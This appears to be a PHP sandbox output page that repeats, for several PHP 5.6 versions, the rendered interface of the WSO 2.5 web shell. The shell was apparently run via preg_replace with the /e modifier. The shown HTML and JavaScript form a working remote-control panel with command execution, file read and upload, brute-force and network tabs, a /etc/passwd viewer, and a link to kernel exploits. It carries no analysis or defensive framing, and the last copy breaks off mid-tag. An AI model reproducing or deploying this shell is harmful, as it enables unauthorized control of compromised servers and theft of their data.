false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.28
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.28 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.27
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.27 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.26
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.26 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.25
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.25 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input 